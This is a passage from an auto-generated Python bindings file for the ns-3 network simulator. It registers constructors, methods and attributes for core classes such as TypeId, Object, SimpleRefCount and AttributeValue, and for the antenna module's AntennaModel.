cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetHash() const [member function]
cls.add_method('GetHash',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByHash(uint32_t hash) [member function]
cls.add_method('LookupByHash',
'ns3::TypeId',
[param('uint32_t', 'hash')],
is_static=True)
## type-id.h (module 'core'): static bool ns3::TypeId::LookupByHashFailSafe(uint32_t hash, ns3::TypeId * tid) [member function]
cls.add_method('LookupByHashFailSafe',
'bool',
[param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')],
is_static=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
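# TypeId is ns-3's run-time type registry; the static lookups bound above
# allow introspection along these lines (sketch, assuming ns.core):
#
#   tid = ns.core.TypeId.LookupByName('ns3::CosineAntennaModel')
#   for i in range(tid.GetAttributeN()):
#       print(tid.GetAttributeFullName(i))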
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Initialize() [member function]
cls.add_method('Initialize',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoInitialize() [member function]
cls.add_method('DoInitialize',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
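# The next six functions all bind instantiations of the same
# SimpleRefCount<T, ns3::empty, ns3::DefaultDeleter<T>> template; each
# exposes only the default constructor, the copy constructor and the
# static Cleanup() hook.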
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
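# TraceSourceAccessor is the abstract hook behind ObjectBase::TraceConnect*
# bound earlier; all four Connect/Disconnect variants are pure virtual, so
# only the concrete accessors generated for specific trace sources in the
# C++ code can actually be instantiated.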
def register_Ns3AntennaModel_methods(root_module, cls):
## antenna-model.h (module 'antenna'): ns3::AntennaModel::AntennaModel(ns3::AntennaModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AntennaModel const &', 'arg0')])
## antenna-model.h (module 'antenna'): ns3::AntennaModel::AntennaModel() [constructor]
cls.add_constructor([])
## antenna-model.h (module 'antenna'): double ns3::AntennaModel::GetGainDb(ns3::Angles a) [member function]
cls.add_method('GetGainDb',
'double',
[param('ns3::Angles', 'a')],
is_pure_virtual=True, is_virtual=True)
## antenna-model.h (module 'antenna'): static ns3::TypeId ns3::AntennaModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
